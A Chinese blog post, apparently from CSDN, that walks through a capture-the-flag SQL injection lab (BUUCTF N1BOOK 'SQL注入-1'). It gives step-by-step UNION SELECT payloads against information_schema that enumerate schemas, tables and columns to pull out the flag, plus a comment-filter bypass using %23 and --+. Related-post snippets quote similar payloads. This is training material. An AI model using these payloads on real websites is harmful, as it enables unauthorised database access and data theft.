【N1BOOK】[第一章 web入门],sql注入1wp

最新推荐文章于 2023-07-15 23:19:48 发布
最新推荐文章于 2023-07-15 23:19:48 发布
阅读量204 收藏
点赞数
分类专栏: buu 文章标签: unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51325053/article/details/120987406
版权
本文详细描述了一次SQL注入攻击的过程,从?id=1a的异常响应揭示了类型转换规则,到通过注入点发现数据库有三列。利用‘union select’语法,逐步揭示了数据库的schema名、表名和字段名,并最终成功爆破出flag。文章深入探讨了SQL注入技术,包括#符号过滤、%23编码以及--+注释方式的绕过策略。
摘要由CSDN通过智能技术生成
  1. 先判断为字符型注入

?id = 2-1 无显示
?id=1a 返回正常

在mysql中,等号两边如果类型不一致,则会发生强制转换。
当字符型和数字型数据比较,字符型将被强制性转换为数字
字符串“1a” 被强制性转换为1。
  1. id后面输入1到3,返回正常,直到输入4,无回显,推测有三列

1’ order by 1,2,3%23

  1. 发现#被过滤,采用url对应编码%23
    或者
    用–+,也可以用作注释

  2. 继续查注入点

id=a’ union select 1,2,3%27

在这里插入图片描述

id=a’ union select 1,2,group_concat(schema_name) from information_schema.schemata%23

在这里插入图片描述
这里有个疑问为什么不能??
1,group_concat(schema_name) from information_schema.schemata,3%23

  • 找库名

  • 找表名
    ?id=a' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='note'%23

  • 找字段名
    ?id=a' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='fl4g'%23

  • 得到字段名fllllg后,继续爆破
    ?id=a' union select 1,2,group_concat(concat_ws(0x23,fllllag)) from note.fl4g%23

得到flag

XUYsusuj
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-wp-[第一章 web入门]SQL注入-1
Accompany的博客
11-28 1266
文章目录开始进行注入get基于报错的注入,首先通过order by判断字段名利用union select 联合查询,查询字段确定好位置后,利用union select 联合查询,获取数据库名得到数据库名后进行爆表,得到表名得到表名后进行爆列爆列完成后查看记录 又是一个小小的分享,display() 进入页面后使用最经典的单引号判断法返回与id=1时不同的错误信息,便可以得知此题存在sql注入 然后通过如下操作可判断其是个字符型注入 此处的判断对于此题有点冗余,两种注入的差别并不大 id=1%27%20a
CTF刷题记录之Buuctf-N1BOOK——sql注入1
m_de_g的博客
06-07 1274
Buuctf刷题————N1BOOK——sql注入1 一、思路 1.URL后面的id=1,2,3;会出现不同的界面,但是,但我们输入4时,发现没有回显 2.推测有有三列,还是老方法, http://4d366f97-7645-4633-a532-1b86e5b44f90.node3.buuoj.cn/index.php?id=1’ 没有回显,当我们使用#注释’的时候,发现没有回显 http://4d366f97-7645-4633-a532-1b86e5b44f90.node3.buuoj.cn/in
BUUCTF N1BOOK [第一章 web入门]SQL注入-1
hivjianxian的博客
11-22 668
ctf题解
N1BOOK[第一章 web入门]SQL注入
cfy2401926342的博客
02-09 283
tips=1 开启mysql错误提示。
N1BOOK第三关摸鱼:[第一章 web入门]SQL注入-1
weixin_45571987的博客
11-30 3199
BUUCTF:[第一章 web入门]SQL注入-1寻找注入点尝试注入测试有几个回显开始查库查表查字段flag 寻找注入点   由域名和题目的名字可以知道咱们这道题需要尝试对它进行SQL注入http://554314db-43b4-4f9d-b9bb-b6089db353a1.node3.buuoj.cn/index.php?id=1 ?id=1’ and 1=2 页面出现错误,说明存在注入点 id 尝试注入 测试有几个回显 ?id=1’ order by3 --+ 页面正常 ?id=1’ order
第三章-制作第一个Flash动画2022优秀文档.ppt
11-14
本章主要介绍了如何制作第一个Flash动画,让我们深入探讨一下。\n\n**动画制作的基本流程**\n\n1. **构思动画**:在开始制作前,首先需要清晰地定义动画的主题和创意,明确动画想要传达的信息,并考虑观众的接受度。...
小牛N1全车电路图小牛N1S
10-04
小牛N1全车电路图
KFR-26W-BP3N1-L1813
05-27
标题中的“KFR-26W-BP3N1-L1813”是一个特定的空调型号,通常代表了该产品的制造商、系列、功率、功能等信息。在空调行业中,这种型号编码通常遵循一定的规则,便于制造商管理和消费者识别。在这个型号中,“KFR”...
小牛N1线束定义接线图电路图
10-31
小牛N1线束定义接线图电路图
小牛N1s电路图(A3打印)
05-19
《小牛N1s电路图解析与探讨》 在当今智能电动车领域,小牛N1s凭借其出色的性能和设计理念赢得了众多消费者的喜爱。对于爱好DIY或者希望深入了解电动车内部构造的用户来说,小牛N1s的电路图无疑是至关重要的参考资料...
BUUCTF [第一章 web入门]SQL注入-1
m0_49025459的博客
04-08 4834
题目 先找注入点,看一url 发现了 ?id=1测试一下是字符型注入还是数字型注入 分别对url进行如下修改,发现页面没有变化,证明不是字符型注入 id=1 and 1 = 1--+ id=1 and 1 = 2--+ 分别对url进行如下修改 id=1' and 1 = 1--+ id=1' and 1 = 2--+ 在更改url为第二个的时候,发现页面出现错误,证明存在字符型注入点 判断字符段的数量 id=1' order by 3 --+ id=1' order ...
简单的sql注入WP
Yale的博客
03-19 1089
这题比较简单,我们就直接手工注入了 这里给大家推荐一个火狐插件hackbar,在做web题的时候还是挺好用的 下面开始介绍手工的流程:1)输入1,提交,不报错 2)输入1‘,提交,报错,判断存在注入。 3)根据同类型题目的经验,初步预计后台表为flag,字段名为flag,需要构造union select flag from flag 4)根据第二步的报错信息看,多加个‘,后面的语句需要再构
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1173
简单的SQL注入
[第一章 web入门]SQL注入-1
qq_53386879的博客
07-15 114
干净的一批,只有一串英文无从下手再看看url框有个熟悉又经典的id=1,试着改一下id=2咦,发现了新大陆盲猜这里可能有注入点。
BuuCTFN1BOOK~SQL注入1
Yinger699的博客
09-27 506
hello~大家好!我是’今天不吃糖, 一只纯纯的小白,正在学习CTF,写文章目的是为了多积累一下解题思路 1.通过判断id=1,2,3,4发现,只有当id=4时没有回显,初次判定字段数为3. 2.判断闭合方式 (1)在id=1后加一个单引号 发现没有回显,证明不是使用单引号闭合的 (2)在单引号后添加# 发现也没有回显,大佬说,这是编码的问题,将’#进行URL编码 果然,正常回显了,达到闭合效果。 3.判断是否过滤了and和or (1)输入万能钥匙 ’ or 1=1# 证明or没被过滤 and也没有被
《从0到1:CTFer成长之路》书籍配套题目[第一章 web入门]SQL注入
wuyaowangchuan的博客
11-19 2026
这道题没有过滤,超级简单 文章目录手注sqlmap跑 进入环境 手注 b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1' http://b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1%27%20and%201=1%20%23 id=1%27%20and%201=2%20%23 说明是字符型注入 然后开始注入 ?id=1%27.
concat拼接的坑 mysql_mysql拼接字符串 CONCAT()和CONCAT_WS()函数
weixin_39875516的博客
12-19 636
表结构:# CONCAT()函数用于将多个字符串连接成一个字符串,返回结果为连接参数产生的字符串SELECT CONCAT('http://www.rootop.org/user.php?id=',`id`,'&type=user') AS `user`FROM `a`WHERE `id` = 2;#返回值 http://www.rootop.org/user.php?id=2&t...
N1Book [第一章 web入门]-sql注入
m0_61368098的博客
08-20 773
重要的数据库:   information_schema   包含MySQL中所有的数据库信息 重要的表:   schemata   mysql中所有数据库的信息   schema_name  所有数据库名   tables   数据库表中的信息   table_schema 记录数据库名    table_name  记录数据表名 columns   列信息 column_name  字段名
sqli-labs通关wp
D-R0s1的博客
04-11 6492
第一关: 方法一:在id=1后面加一个单引号后发现报错 然后把这个单引号注释掉试一下 使用'or 1=1--+ order by 查列数页面显示正常了。存在注入,先查一下列数 http://127.0.0.1/sqli-labs/Less-1/?id=1%27%20order%20by%203--+ 使用单引号闭合掉一个单引号,在用--+或#或%27注释掉一个,便可以使中间的order...
buuctf n1book
最新发布
08-23
根据引用、和的信息,buuctf n1book是一个与CTF(Capture The Flag)竞赛相关的主题或者密码。在引用中提到了一个关于SQL注入的话题,引用中提到了关于AES加密和解密的信息,而引用中提到了一个关于佛莱格的密码。根据这些信息,buuctf n1book可能是一个CTF竞赛中使用的密码或者解密信息的关键词。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [BUUCTF笔记之N1BOOK](https://blog.csdn.net/shuaicenglou3032/article/details/117934550)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值